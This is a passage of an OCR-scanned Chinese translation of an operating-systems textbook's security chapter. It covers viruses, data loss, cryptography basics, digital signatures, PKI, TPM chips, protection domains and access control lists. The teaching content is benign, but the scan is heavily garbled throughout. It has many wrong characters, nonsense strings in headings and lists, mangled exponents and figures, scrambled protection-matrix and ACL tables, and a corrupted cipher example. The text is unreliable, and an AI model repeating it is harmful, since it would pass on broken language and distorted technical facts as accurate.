针对 哪 一 类 入 侵 者 。 


近年 来 ， 另 一 类 安全 上 的 隐 叫 融 是 病毒 ， 我 们 将 在 以 后 的 章 万 中 
详细 讨论 它 。 简 而 言 之 ， 病 毒 就 是 一 段 能 够 目 我 复制 并 通 间 会 产生 危 
害 的 程序 代码 。 从 某 种 意义 上 来 说 ， 编 写 病 毒 的 人 也 是 入 侵 痢 ， 他 们 
往往 拥有 较 高 的 专业 技能 。 一 般 的 入 侵 痢 和 病毒 的 区 别 在 于 ， 前 者 指 
想 要 私 目 闻 入 系统 并 进行 破坏 的 个 人 ， 后 者 指 被 人 编写 并 释放 传播 企 
图 引起 危害 的 程序 。 入 侵 者 设法 进入 特定 的 计算 机 系统 (如 属于 银行 
或 五 角 大 楼 的 某 台 机 器 ) 来 窃取 或 破坏 特定 的 数据 ， 而 病毒 作者 常常 
想 造成 破坏 而 不 在 乎 谁 是 受害 者 。 


9.1.3 ZOR EINER 


除了 恶意 入 侵 造成 的 威胁 外 ， 有 价值 的 信息 也 会 意外 遗失 。 造 成 
数据 意外 遗失 的 原因 通 音 包括 : 


LRK: 火灾 、 洪 水、 地 震 、 战 争 、 雄 乱 或 老 由 对 人 磁 融 和 软盘 的 
HE ° 


2. 软 硬件 错误 : CPUWR ` RARA EAA > SCR BTS 
里 的 错误 。 


3. 人 为 过 失 : 不 正确 的 数据 登录 、 错 误 的 磁 市 或 磁盘 安 狂 、 运 行 
了 错误 的 程序 、 位 市 或 磁 副 的 遗失 ， 以 及 其 他 的 过 失 等 。 


上 述 大 多 数 情况 可 以 通过 适当 的 备份 ， 尤 其 古 对 原始 数据 的 远 地 
备份 来 避免 。 在 防范 数据 不 被 狭 猎 的 入 侵 者 获取 的 同时 ， 防 止 数据 意 
外 遗失 应 得 到 更 广泛 的 重视 。 事 实 上 ， 数 据 意 外 遗失 市 来 的 损失 比 入 
侵 者 市 来 的 损失 可 能 更 大 。 


9.2 ”密码 学 原理 


加 密 在 安全 领域 扮演 着 非常 重要 的 角色 。 很 多 人 对 于 报纸 上 的 字 
it (newspaper cryptograms) 都 不 陌生 ， 这 种 加 密 算法 不 过 是 一 个 字谜 
游戏 ， 其 中 明文 中 的 每 个 字母 被 奉 换 为 男 一 个 字母 。 这 种 加 密 算法 与 
现代 加 密 算 法 有 着 非常 紧密 的 关联 SURE STREAK ZAI BR 
系 一 样 ) 。 在 本 中 我 们 将 乌 梧 计算 机 时 代 的 密码 学 ， 其 中 的 某 些 内 
容 可 能 会 对 读者 理解 后 续 章 节 有 所 帮助 ， 任 何 对 安全 这 个 话题 感 兴趣 
的 读者 都 应 该 对 本 章 中 讲述 的 基本 问题 有 所 了 解 。 但 是 ， 对 密码 学 的 
详细 前述 超越 了 本 书 的 范围 。 不 过 ， 许 多 优秀 的 书籍 都 详细 讨论 了 这 
一 话题 ， 有 兴趣 的 读者 可 以 拿 来 参考 (如 Kaufman 等 人 ，2002; 
Pfleeger, 2006) 。 接 下 来 ， 我 们 为 不 太 熟 悉 密 码 学 的 读者 做 一 个 快速 
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加 密 的 目的 是 将 明文 一 一 也 就 是 原始 信息 或 文件 ， 通 过 采种 手段 
变 为 密 文 ， 通 过 这 种 手段 ， 只 有 经 过 授权 的 人 才 知 道 如 何 将 密 文 恢复 
为 明文 。 对 无 天 的 人 来 说 ， 密 文 是 一 段 无 法 理解 的 编码 。 虽 然 这 一 领 
域 对 初学 者 来 说 听 上 去 比较 新 奇 ， 但 是 加 密 和 解密 算法 HO 往往 
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要 保密 数据 的 人 对 系统 的 安全 性 产生 错误 理解 。 在 专业 上 ， 这 种 策略 
叫做 模糊 安全 (security by obscurity) ， 而 且 只 有 安全 领域 的 爱好 者 们 


才 使 用 该 策略 。 奇 怪 的 是 ， 在 这 些 爱 好 者 中 也 包括 了 许多 跨国 公司 ， 
但 是 他 们 应 该 是 了 解 更 多 专业 知识 的 。 


在 算法 中 使 用 的 加 密 参 数 叫 做 密 钥 (key) 。 如 果 P 代 表明 文 ，KE 
代表 加 密 密 钥 ，C 代 表 密 文 ，E 代 表 加 密 算法 (BN, WE) ， 那 么 
C=E(PKFE )。 这 束 古 加 密 的 定义 。 其 含义 是 把 明文 P 和 加 密 密 钥 KE 作为 
参数 ， 通 过 加 密 算法 E 束 可 以 把 明文 变 为 密 文 。 和 从 兰 密码 学 家 
Kerckhoffs 于 19 世 纪 提 出 了 Kerckhoffs 原 则 。 该 原则 认为 ， 加 密 算法 本 
身 应 该 完全 公开 ， 而 加 密 的 安全 性 由 独立 于 加 密 算 法 之 外 的 密 钥 决 
定 。 现 在 所 有 闫 谍 的 密码 学 家 都 苯 循 这 一 原则 。 


HEH, SDN RIE, Kp 表示 解密 密 钥 时 ，P=D(C,Kp )。 
也 就 是 说 ， 要 想 把 密 文 还 原 成 明文 ， 可 以 用 密 文 C 和 人 解密 密 角 Kp 作为 
参数 ， 通 过 解密 算法 DD 进行 运算 。 这 两 种 互 逆 运 算 间 的 天 系 如 图 9-2 所 
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图 9-2 明文 和 密 文 间 的 关系 


9.2.1 私 钥 加 密 技 术 


为 了 描述 得 更 清楚 些 ， 我 们 假设 在 茶 一 个 加 密 算 法 里 每 一 个 字母 
都 由 另 一 个 不 同 的 字母 殖 代 ， 如 所 有 的 A 被 Q 蔡 代 ， 所 有 的 B 和 被 W 竺 
代 ， 所 有 的 C 被 E 蔡 代 ， 以 下 依次 类 推 : 


HHX: ABCDEFGHIJKLMNOPQRSTUVWXYZ 
ML: QWERTYUIOPASDFGHJKLZXCVBNM 


这 种 密 钥 系统 叫做 单字 母 蔡 换 ，26 个 字母 与 整个 字母 表 相 匹配 。 
在 这 个 实例 中 的 加 密 密 钥 为 : 
QWERTYUIOPASDFGHJKLZXCVBNM。 利 用 这 样 的 密 钥 ， 我 们 可 以 
把 明文 AITACK 转 换 为 QZZQEA。 同 时 ， 利 用 解密 密 钥 可 以 告诉 我 们 如 
何 把 密 文 恢复 为 明文 。 在 这 个 实例 中 的 解密 密 钥 为 : 
KXVMCNOPHQRSZYIJADLEGWBUFT。 我 们 可 以 看 到 密 文中 的 A 是 
明文 中 的 K， 密 文中 的 B 是 明文 中 的 XxX， 其 他 字母 依次 类 推 。 


从 表面 上 看 ， 这 是 一 个 安全 的 密 钥 机 制 ， 因 为 密码 破译 者 虽然 知 
道 普通 密 钥 机 制 《字母 与 字母 间 的 替换 ) ， 但 他 并 不 知道 26!x4x10”6 
中 哪 一 个 是 可 能 的 密 钥 。 但 是 ， 给 定 一 小 段 密 文 ， 这 个 密码 还 是 能 够 


被 轻易 破译 挥 。 破 详 的 基础 在 于 利用 了 目 然 语言 的 统计 特性 。 在 秽语 


中 ， 如 e 是 最 单 用 的 字母 ， 接 下 来 是 ，o0，a，n，j 等 。 最 音 用 的 双 字 母 
组 合 有 th，in，er，re 等 。 利 用 这 类 信息 ， 破 详 该 密码 古 较 为 容易 的 。 


许多 类 似 的 密 钥 系 统 都 有 这 样 一 个 特点 ， 那 束 是 给 定 了 加 密 密 钥 
束 能 够 较为 容易 地 找到 解密 密 钥 ， 反 之 亦 然 。 这 样 的 系统 采用 了 私 钥 
加 密 技术 或 对 称 密 钥 加 密 技术 。 虽 然 蛙 字母 蔡 换 方式 没有 使 用 价值 ， 
但 是 如 末 密 钥 有 足够 的 长 度 ， 对 称 密 钥 机 制 还 古 相 对 比较 安全 的 。 对 
严格 的 安全 系统 来 说 ， 最 少 需要 使 用 256 位 密 钥 ， 因 为 它 的 破译 空间 为 
2°98 21.2107" “。 短 密 钥 只 能 够 抵挡 业余 爱好 者 ， 对 政府 部 门 来 说 却 是 
不 安全 的 。 


9.2.2” 公 钥 加 密 技 术 


由 于 对 信息 进行 加 密 和 解密 的 运算 量 是 可 控制 的 ， 所 以 私 钥 加 密 
体系 十 分 有 用 。 但 是 它 也 有 一 个 缺陷 : 发 送 者 与 接受 者 必须 同时 拥有 
密 钥 。 他 们 其 至 必须 有 物理 上 的 接触 ， 才 能 传递 密 钥 。 为 了 解决 这 个 
矛盾 ， 人 们 引入 了 公 钥 加 密 技 术 (1976 年 由 Diffie 和 Hellman 提 出 ) ° 


入 选 过 的 加 密 密 钥 后 不 可 能 推出 对 应 的 解密 密 钥 。 在 这 种 特性 下 ， 加 
密 密 钥 可 被 公开 而 只 有 解密 密 钥 处 于 秘密 状态 。 


为 了 让 大 家 感受 一 下 公 钥 密码 体制 ， 请 看 下 面 两 个 问题 : 
问题 1: 314159265358979x314159265358979 等 于 多 少 ? 
问题 2，3912571506419387090594828508241 的 平方 根 是 多 少 ? 


如 打 给 一 张 纸 和 一 文 和 车， 加 上 一 大 杯 冰 激 姿 作为 正确 答案 的 奖 
励 ， 那 么 大 多 数 六 年 级 学 生 可 以 在 一 两 个 小 时 内 做 出 问题 1 的 答案 。 而 
如 果 给 一 般 成 年 人 纸 和 笔 ， 并 许诺 回答 出 正确 答案 可 以 免 去 终 映 50% 
税收 的 话 ， 大 多 数 人 还 是 不 能 在 没有 计算 釉 、 计 算 机 或 其 他 外 界 帮 助 
的 条 件 下 解答 出 问题 2 的 答案 。 虽 然 平方 和 求 平方根 互 为 逆 运 算 ， 但 是 
它们 在 计算 的 复杂 性 上 却 有 很 大 差异 。 这 种 不 对 称 性 构成 了 公 钥 密码 


体系 的 基础 。 在 公 钥 密码 体系 中 ， 加 密 运 算 比 较 简 单 ， 而 没有 密 钥 的 
解密 运算 却 十 分 楷 琐 。 


一 种 叫做 RSA 的 公 钥 机 制 表明 : 对 计算 机 来 说 ， 大 数 乘法 比 对 大 
数 进 行 因 式 分 解 要 容易 得 多 ， 特 别 是 在 使 用 取 模 算法 进行 运算 且 每 个 
数字 都 有 上 百 位 时 (Rivest 等 人 ,1978) 。 这 种 机 制 广泛 应 用 于 密码 领 
域 。 其 他 广泛 使 用 的 还 有 离散 对 数 (El Gamal,1985) 。 公 钥 机 制 的 主 
要 问题 在 于 运算 速度 要 比 对 称 密 钥 机 制 慢 数 千 倍 。 


当 我 们 使 用 公 钥 密码 体系 时 ， 每 个 人 都 拥有 一 对 密 钥 ( 公 钥 和 私 
钥 ) 并 把 其 中 的 公 钥 公开 。 公 钥 是 加 密 密 钥 ， 私 钥 是 解密 密 铀 。 通 常 
密 钥 的 运算 是 目 动 进行 的 ， 有 时 候 用 户 可 以 目 选 密码 作为 算法 的 种 
子 。 在 发 送 机 密 信 息 时 ， 用 接收 方 的 公 铀 将 明文 加 密 。 由 于 只 有 接收 
方 拥有 私 钥 ， 所 以 也 只 有 接收 方 可 以 解密 信息 。 


9.2.3 Ain) EKAN 


在 接 下 来 的 许多 场合 里 ， 我 们 将 看 到 有 些 函 数 f， 其 特性 是 给 定 {f 
和 参数 x， 很 容易 计算 出 y=f(x)。 但 是 给 定 f(x)， 要 找到 相应 的 x 却 不 可 
行 。 这 种 函数 采用 了 十 分 复杂 的 方法 把 数 子 打 乱 。 具 体 做 法 可 以 首先 
将 y 初 始 化 为 x。 然 后 可 以 有 一 个 循环 ， 进 行 多 次 迭代 ， 只 要 在 x 中 有 1 
位 就 继续 迭代 ， 随 着 每 次 迷 代 ，y 中 的 各 位 的 排列 以 与 类 代 相 关 的 方式 
进行 ， 每 次 迭代 时 添加 不 同 的 和 常数， 最 终生 成 了 彻 克 打 乱 位 的 数字 排 
列 。 这 样 的 函数 叫做 加 密 散 列 函数 。 


9.2.4 NMFS 


经 前 性 地 使 用 数字 签名 是 很 有 必要 的 。 例 如 ， 假 设 银 行 客户 通过 
发 大 电子 邮 件 通知 银行 为 其 购 严 股票 。 一 小 时 后 ， 定 单 发 出 并 成 区 ， 
但 随后 股票 大 中 了。 现在 客户 否认 曾经 发 送 过 电子 邮件 。 银 行当 然 可 
以 出 示 电 子 邮件 作为 证 据 ， 但 是 客户 也 可 以 声称 是 银行 为 了 获得 佣金 
而 伪造 了 电子 邮件 。 那 么 法 官 如 何 来 找到 真相 呢 ? 


通过 对 邮件 或 其 他 电子 文档 进行 数字 签名 可 以 解决 这 类 问题 ， 并 
且 保 证 了 发 送 方 日 后 不 能 抵赖 。 其 中 的 一 个 通常 使 用 的 办 法 是 首先 对 
文档 运行 一 种 单 向 散 列 运算 (hashing) ， 这 种 运算 几乎 是 不 可 逆 的 。 
散 列 函数 通常 独立 于 原始 文档 长 度 产 生 一 个 固定 长 度 的 结果 值 。 最 常 
用 的 散 列 函数 有 MD5 (Message Digest 5) ， 一 种 可 以 产生 16 个 字 节 结 
果 的 算法 (Rivest, 1992) 以 及 SHA-1 (Secure Hash Algorithm) ， 一 种 
可 以 产生 20 个 字 节 结果 的 算法 (NIST, 1995) 。 比 SHA-1 更 新 版 本 有 
SHA-256 和 SHA-512， 它 们 分 别 产 生 32 字 节 和 64 字 节 的 散 列 结果 ， 但 是 
迄今 为 止 ， 这 两 种 加 密 算 法 依然 没有 得 到 广泛 使 用 。 


下 一 步 假设 我 们 使 用 上 面 讲 过 的 公 钥 密码 。 文 件 所 有 者 利用 他 的 
私 钥 对 散 列 值 进 行 运 算得 到 D( 散 列 值 )。 该 值 称 为 签名 块 (signature 
block) ， 它 被 附加 在 文档 之 后 传送 给 接收 方 ， 如 图 9-3 所 示 。 对 散 列 值 


应 用 D 有 些 像 散 列 解密 ， 但 这 并 不 是 真正 意义 上 的 解密 ， 因 为 散 列 值 并 
没有 被 加 密 。 这 不 过 是 对 散 列 值 进行 的 数学 变换 。 


对 散 列 值 运 
算得 到 DD 


— wit 


文档 压缩 后 
得 到 散 列 值 


原始 文档 


签名 块 { D ( 散 列 值 ) 


a) b) 
图 9-3 a) 对 签名 块 进行 运算 ; Db) 接 收 方 获取 的 信息 


接收 方 收 到 文档 和 散 列 值 后 ， 首 先 使 用 事先 取得 一 致 的 MD5 或 
SHA 算法 计算 文档 的 做 列 值 ， 然 后 接收 方 使 用 发 送 方 的 公 钥 对 签名 块 
进行 运算 以 得 到 E(D(hash)) 。 这 实际 上 是 对 解密 后 的 散 列 进行 “加 
T, 操作 抵消 ， 以 恢复 原 有 的 艇 列 。 如 果 计 算 后 的 散 列 值 与 签名 块 中 
WAZED, MRH: 要 么 文档 、 要 么 签名 块 、 要 么 两 者 共同 被 
AUOT (或 无 意 中 被 改动 ，。 这 种 方法 仪 仅 对 一 小 部 分 数据 ( 散 列 ) 
运用 了 (ER) 公 钥 密码 体制 。 请 注意 这 种 方法 仅仅 对 所 有 满足 下 
面条 件 的 x 起 作用 : 


E(D(x))=x 


我 们 并 不 能 保证 所 有 的 加 密 函 数 都 拥有 这 种 属性 ， 因 为 我 们 原来 
PREOR A wie: 


D(E(x))=x 


EAE, EST HM, DD 是 解密 函数 。 而 为 了 满足 签名 的 要 求 ， 
函数 运算 的 次 序 是 不 受 影响 的 。 也 就 是 说 ，D 和 FE 一 定 是 可 交换 的 函 
数 。 而 RSA 算 法 就 有 这 种 属性 。 


要 使 用 这 种 签名 机 制 ， 接 收 方 必 须知 道 发 送 方 的 公 钥 。 有 些 用 户 
在 其 Web 网 页 上 公开 他 们 的 公 钥 ， 但 是 其 他 人 并 没有 这 么 做 ， 因 为 他 们 
担心 入 侵 者 会 间 入 并 悄悄 地 改动 其 公 钥 。 对 他 们 来 说 ， 需 要 其 他 方法 
来 发 布 公 钥 。 消 息 发 送 方 的 一 种 音 用 方法 是 在 消 妃 后 附加 数字 证 书 ， 
证 书 中 包含 了 用 户 姓 名 、 公 铀 和 可 信任 的 第 三 方 数 字 签 名 。 一 旦 用 户 
获得 了 可 信 的 第 三 方 认证 的 公 钥 ， 那 么 对 于 所 有 使 用 这 种 可 信 第 三 方 
确认 来 生成 自己 证 书 的 发 送 方 ， 该 用 户 都 可 以 使 用 他 们 的 证 书 。 


认证 机 构 (Certification Authority, CA) 作为 可 信 的 第 三 方 ， 提 供 
签名 证 书 。 然 而 如 果 用 户 要 验证 有 CA 签名 的 证 书 ， 就 必须 得 到 CA 的 公 
钥 ， 从 哪里 得 到 这 个 公 钥 ? 即使 得 到 了 用 户 又 如 何 确定 这 的 确 是 CA 的 
公 钥 呢 ? 为 了 解决 上 述 两 个 问题 ， 需 要 一 套 完 整 的 机 制 来 管理 公 钥 ， 
这 套 机 制 叫做 PKI (Public Key Infrastructure， 公 钥 基 础 设施 ) 。 网 络 浏 
览 器 已 经 通过 一 种 特别 的 方式 解决 了 这 个 问题 : 所 有 的 浏览 器 都 预 加 
载 了 大 约 40 个 著名 CA 的 公 钥 。 


上 面 我 们 叙述 了 可 用 于 数字 证 书 的 公 钥 密 码 体制 。 同 时 ， 我 们 也 
有 必要 指出 不 包含 公 钥 体制 的 密码 体系 同样 存在 。 


9.2.55 PRF ERIR 


加 密 算 法 都 需要 密 钥 (Key) ° WRAAE S, MAET 
钥 的 信息 也 等 同 于 泄露 了 ， 可 见 选 择 一 种 安全 的 方法 存储 密 钥 是 必要 
的 。 接 下 来 的 问题 是 : 如 何在 不 安全 的 系统 中 安全 地 保存 密 钥 呢 ? 


有 一 种 方法 在 工业 上 已 经 被 采用 ， 该 方法 需要 用 到 一 种 叫做 可 信 
平台 模块 (Trusted Platform Modules, TPM) 的 芯片 。TPM 是 一 种 加 
密 处 理 器 (cryptoprocessor) ， 使 用 内 部 的 非 易 失 性 存储 介质 来 保存 密 
钼 。 该 芯片 用 硬件 实现 数据 的 加 密 /解密 操作 ， 其 效果 与 在 内 存 中 对 明 
文 块 进行 加 密 或 对 密 文 块 进行 解密 的 效果 相同 ，TPM 同 时 还 可 以 验证 
数字 签名 。 由 于 其 所 有 的 操作 都 是 通过 硬件 实现 ， 因 此 速度 比 用 软件 
实现 快 许多 ， 也 更 可 能 被 广泛 地 应 用 。 一 些 计算 机 已 经 安装 了 TPM 心 
片 ， 预 期 更 多 的 计算 机 会 在 未 来 安装 。 


TPM 的 出 现 引 发 了 很 多 和 争议， 因为 不 同 三 商 、 机 构 对 于 谁 来 控制 
TPM 和 和 它 用 来 保护 什么 有 分 睹 。 微 软 大 力 提 倡 采 用 TPM 改 片 ， 并 且 为 
此 开发 了 一 系列 应 用 于 TPM 的 技术 ， 包 括 Palladiuom、NGSCB 以 及 
BitLocker。 微 软 的 观点 是 ， 由 操作 系统 控制 TPM 心 片 ， 并 使 用 该 芯片 
阻止 非 授 权 软 件 的 运行 。* 非 授权 软件 ”可 以 是 盗版 〈 非 法 复制 ) 软件 
或 仅仅 是 没有 经 过 操作 系统 认证 的 软件 。 如 果 将 TPM 应 用 到 系统 启动 


的 过 程 中 ， 则 计算 机 只 能 局 动 经 过 内 置 于 TPM 的 密 钥 签名 的 操作 系 

统 ， 该 密 钥 由 TPM 生 产 商 所 供 ， 该 密 钥 只 会 透露 给 允许 被 安 朔 在 该 计 
算 机 上 的 操作 系统 的 生产 商 (如 微软 ) 。 因 此 ， 使 用 TPM 可 以 限制 用 
户 对 软件 的 选择 ， 用 户 或 许 只 能 选择 经 过 计算 机 生产 商 授权 的 软件 。 


由 于 TPM 可 以 用 于 防止 普 乐 与 电影 的 次 版， 这些 媒 体 生产 两 对 该 
心 片 表现 出 了 浓厚 的 兴趣 。TPM 同 样 开启 了 新 的 商业 模式 ， 如 “ 租 
借 ” 歌 曲 与 电影 。TPM 通 过 检查 日 期 判断 当前 媒体 是 否 已 经 “过 期 *， 如 
果 过 期 ， 则 拒绝 为 该 媒体 解码 。 


TPM 还 有 非常 广泛 的 应 用 领域 ， 而 这 些 领 域 都 是 我 们 还 未 涉足 
的 。 有 趣 的 是 ，TPM 并 不 能 提高 计算 机 在 应 对 外 部 攻击 中 的 安全 性 。 
事实 上 ，TPM 关 注 的 重点 是 采用 加 密 技术 来 阻止 用 户 做 任何 未 经 TPM 
控制 者 直接 或 间接 授权 的 事情 。 如 果 读 者 想 了 解 更 多 关于 TPM 的 内 
容 ， 在 Wikipedia 中 关于 可 信 计 算 (Trusted Computing) 的 文献 可 能 会 
对 你 有 所 帮助 。 


9.3 ”保护 机 制 


如 条 有 一 个 清晰 的 模型 来 制定 哪些 事情 是 允许 做 的 ， 以 及 系统 的 
哪些 资源 需要 保护 ， 那 么 实现 系统 安全 将 会 简单 得 多 。 事 实 上 很 多 安 
全 方面 的 工作 都 是 试 独 确定 这 些 问题 ， 到 现在 为 止 我 们 也 只 十 浅 和 芝 辑 
止 而 已 。 我 们 将 独 重 论述 几 个 有 普 遇 性 的 模型 ， 以 及 增强 它们 的 机 
制 。 


9.3.1 你 扩 域 


计算 机 系统 里 有 许多 需要 保护 的 “对 象 *。 这 些 对 象 可 以 是 硬件 
(如 CPU、 内 存 段 、 人 磁盘 驱动 器 或 打印 机 ) 或 软件 (如 进程 、 文 件 、 
数据 库 或 信号 量 ) 。 


每 一 个 对 象 都 有 用 于 调用 的 单一 名 称 和 人 允许 进程 运行 的 有 限 的 一 
系列 操作 。read 和 write 是 相对 文件 而 言 的 操作 ;up 和 down 是 相对 信和 号 
量 而 言 的 操作 。 


显而易见 的 是 ， 我 们 需要 一 种 方法 来 禁止 进程 对 某 些 未 经 授权 的 
对 象 进行 访问 。 而 且 这 样 的 机 制 必须 也 可 以 在 需要 的 时 候 使 得 受到 限 
制 的 进程 执行 某 些 合法 的 操作 子 集 。 如 进程 A 可 以 对 文件 F 有 读 的 权 
限 ， 但 没有 写 的 权限 。 


为 了 讨论 不 同 的 保护 机 制 ， 很 有 必要 介绍 一 下 域 的 概念 。 域 
(domain) 是 一 对 R, 权限 ) 组 合 。 每 一 对 组 合 指定 一 个 对 象 和 
一 些 可 在 其 上 运行 的 操作 子 集 。 这 里 权限 (right) 是 指 对 某 个 操作 的 
执行 许可 。 通 常 域 相当 于 单个 用 户 ， 告 诉 用 户 可 以 做 什么 不 可 以 做 什 
么 ， 当 然 有 时 域 的 范围 比 用 户 要 更 广 。 例 如， 一 组 为 某 个 项 目 编写 代 
码 的 人 员 可 能 都 属于 相同 的 一 个 域 ， 以 便于 他 们 都 有 权 读 写 与 该 项 目 
FARA SCF 


对 象 如 何 分 配给 域 由 需求 来 确定 。 一 个 最 基本 的 原则 就 是 最 低 权 
限 原 则 (Principle of Least Authority, POLA) ， 一 般 而 言 ， 当 每 个 域 都 
拥有 最 少数 量 的 对 象 和 满足 其 完成 工作 所 需 的 最 低 权 限时 ， 安 全 性 将 
达到 最 好 。 


图 9-4 给 出 了 3 种 域 ， 每 一 个 域 里 都 有 一 些 对 象 ， 每 一 个 对 象 都 有 些 
不 同 的 权限 〈 读 、 写 、 执 行 ) 。 请 注意 打印 机 1 同时 存在 于 两 个 域 中 ， 
且 在 每 个 域 中 具有 相同 的 权限 。 文 件 1 同样 出 现在 两 个 域 中 ， 但 它 在 两 
个 域 中 却 具 有 不 同 的 权限 。 


域 ] 域 2 域 3 


文件 1[ 读 写 ] 
文件 4[ 读 写 执行 
交 件 5[ 读 写 ] 


文件 6[ 读 写 执行 


绘图 仪 2[ 写 ] 


文件 1[ 读 ] 
文件 2[ 读 写 ] 


图 9-4 三 个 保护 域 


任何 时 间 ， 每 个 进程 会 在 某 个 保护 域 中 运行 。 换 句 话 谤 ， 进 程 可 
以 访问 某 些 对 象 的 集合 ， 每 个 对 象 都 有 一 个 权限 集 。 进 程 运行 时 也 可 
以 在 不 同 的 域 之 间 切 换 。 域 切换 的 规则 很 大 程度 上 与 系统 有 关 。 


为 了 更 详细 地 了 解 域 ， 让 我 们 来 看 看 UNIX 系 统 (包括 Linux、 
FreeBSD 以 及 一 些 相似 的 系统 ) 。 在 UNIX 中 ， 进 程 的 域 是 由 UID 和 GID 
定义 的 。 给 定 某 个 (UID, GID) 的 组 合 ， 就 能 够 得 到 可 以 访问 的 所 有 
对 象 列 表 (文件 ， 包 括 由 特殊 文件 代表 的 VO 设备 等 ) ， 以 及 它们 是 否 
可 以 读 、 写 或 执行 。 使 用 相同 (UID, GID) 组 合 的 两 个 进程 访问 的 是 
完全 一 致 的 对 象 组 合 。 使 用 不 同 (UID, GID) 值 的 进程 访问 的 是 不 同 
的 文件 组 合 ， 虽 然 这 些 文件 有 大 量 的 重 受 。 


而 且 ， 每 个 UNIX 的 进程 有 两 个 部 分 : 用 户 部 分 和 核心 部 分 。 当 执 
行 系统 调用 时 ， 进 程 从 用 户 部 分 切换 到 核心 部 分 。 核 心 部 分 可 以 访问 
与 用 户 部 分 不 同 的 对 象 集 。 例 如 ， 核 心 部 分 可 以 访问 所 有 物理 内 存 的 
页 面 、 整 个 磁盘 和 其 他 所 有 被 傈 护 的 资源 。 这 样 ， 系 统 调用 束 引 发 了 
域 切 换 。 


当 进 程 把 SETUID 或 SETGID 位 置 于 on 状态 时 可 以 对 文件 执行 exec 
操作 ， 这 时 进程 获得 了 新 的 有 效 UID 或 GID。 不 同 的 (UID，GID) 组 


合 会 产生 不 同 的 文件 和 操作 集 。 使 用 SETUID 或 SETGID 运 行程 序 也 是 
一 种 域 切换 ， 因 为 可 用 的 权限 改变 了 


一 个 很 重要 的 问题 是 系统 如 何 跟踪 并 确定 哪个 对 象 属于 哪个 域 。 
从 概念 来 说 ， 至 少 可 以 预想 一 个 大 和 矩阵， 矩阵 的 行 代表 域 ， 列 代表 对 
象 。 每 个 方块 列 出 对 象 的 域 包 含 的 、 可 能 有 的 权限 。 图 9-4 的 矩阵 如 图 
9-5 所 示 。 有 了 扰 阵 和 当前 的 域 编号， 系统 束 能 够 判断 是 否 可 以 从 指定 
的 域 以 特定 的 方式 访问 给 定 的 对 象 。 


对 象 
文件 1 文件 2 ”文件 3 文件 4 文件 5 ”文件 6 ”打印 机 1 绘 仪 图 2 


Read 
Read jo paac Write 
Execute no 
Read 
Write Write Write 
Execute 


图 9-5 保护 矩阵 


域 的 目 我 切换 在 矩阵 模型 中 能 够 很 容易 实现 ， 可 以 通过 使 用 操作 
enter 把 域 本 和 喘 作 为 对 象 。 图 9-6 再 次 显示 了 图 9-5 的 和 矩阵， 只 不 过 把 3 个 
域 当 作 了 对 象 本 喘 。 域 1 中 的 进程 可 以 切换 到 域 2 中 ， 但 是 一 旦 切换 后 
就 不 能 返回 。 这 种 切换 方法 是 在 UNIX 里 通过 执行 SETUID 程 序 实现 
的 。 不 允许 其 他 的 域 切 换 。 


对 象 
文件 1 文件 2 文件 3 文件 4 文件 5 文件 6 打印 机 1 绘 仪 图 2 域 1 域 2 域 3 


Read 
Write 
Execute 


9-6 ”将 域 作为 对 象 的 保护 矩阵 


9.3.2 ”访问 控制 列表 


在 实际 应 用 中 ， 很 少 会 存储 如 图 9-6 的 矩阵 ， 因 为 矩阵 太 大 、 太 稀 
Gi T° KE RABAT BETA AIT AR, ALR TAP AA 
的 、 几 乎 是 空 的 矩阵 浪费 空间 。 但 是 也 有 两 种 方法 是 可 行 的 。 一 种 是 
按 行 或 按 列 存放 ， 而 仅仅 存放 非 空 的 元 素 。 这 两 种 方法 有 着 很 大 的 不 
同 。 这 一 下 将 介绍 按 列 存放 的 方法 ， 下 一 章节 再 介绍 按 行 存放 。 


第 一 种 方法 包括 一 个 关联 于 每 个 对 象 的 AF) IRE, IRE 
包含 了 所 有 可 访问 对 象 的 域 以 及 这 些 域 如 何 访 问 这 些 对 象 的 方法 。 这 
一 列表 叫做 访问 控制 表 (Access Control List, ACL) ， 如 图 9-7 所 示 。 
这 里 我 们 看 到 了 三 个 进程 ， 每 一 个 都 属于 不 同 的 域 。A、B 和 C 以 及 三 
个 文件 F1、F2 和 F3。 为 了 人 简便， 我 们 假设 每 个 域 相当 于 某 一 个 用 户 ， 
即 用 户 A、B 和 C。 若 用 通常 的 安全 性 语言 表达 ， 用 户 被 叫做 主体 
(subjects 或 principals) ， 以 便 与 它们 所 拥有 的 对 象 《如 文件 ) 区 分 开 
来 o 


l 空间 
ples Bae ee B:RWX: C: RX 


图 9-7 用 访问 控制 表 管 理 文 件 的 访问 


每 个 文件 都 有 一 个 相关 联 的 ACL。 文 件 F1 在 ACL 中 有 两 个 登录 项 
(用 逗号 区 分 ) 。 第 一 个 登录 项 表示 任何 用 户 A 拥 有 的 进程 都 可 以 读 写 
文件 。 第 二 个 登录 项 表示 任何 用 户 B 拥 有 的 进程 都 可 以 读 文 件 。 所 有 这 
些 用 户 的 其 他 访问 和 其 他 用 户 的 任何 访问 都 被 禁止 。 请 注意 这 里 的 权 
限 是 用 户 赋 了 予 的 ， 而 不 是 进程 。 只 要 系统 运行 了 保护 机 制 ， 用 户 A 拥 有 
的 任何 进程 都 能 够 读 写 文 件 F1。 系 统 并 不 在 乎 是 否 有 1 个 还 是 100 个 进 
程 。 所 关心 的 征 所 有 者 而 不 是 进程 ID 。 


文件 F2 在 ACL 中 有 3 个 登录 项 A` BAC 。 它 们 都 可 以 读 文 件 ， 而 
且 B 还 可 以 写 文件 。 除 此 之 外 ,， 不 允许 其 他 的 访问 。 文 件 F3 很 明显 是 个 
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可 执行 文件 ， 因 为 B 和 C 都 可 以 读 并 执行 它 。B 也 可 以 执行 写 操作 。 


这 个 例子 展示 了 使 用 ACL 进 行 保护 的 最 基本 形式 。 在 实际 中 运用 
的 形式 要 复杂 得 多 。 为 了 人 简便 起 见 ， 我 们 目前 只 介绍 了 3 种 权限 : 读 、 
写 和 执行 。 当 然 还 有 其 他 的 权限 。 有 些 是 一 般 的 权限 ， 可 以 运用 于 所 
有 的 对 象 ， 有 些 是 对 象 特定 的 。 一 般 的 权限 有 destory object 和 copy 
object。 这 些 可 以 运用 于 任何 的 对 象 ， 而 不 论 对 象 的 类 型 是 什么 。 与 对 
象 有 关 的 特定 的 权限 会 包括 为 邮箱 对 象 的 append message 和 对 目录 对 象 
的 sort alphabetically ( 按 字母 排序 ) 等 。 


到 目前 为 止 ， 我 们 的 ACL 登 录 项 是 针对 个 人 用 户 的 。 许 多 系统 
支持 用 户 组 (group) 的 概念 。 组 可 以 有 自己 的 名 字 并 包含 在 ACL 中 。 
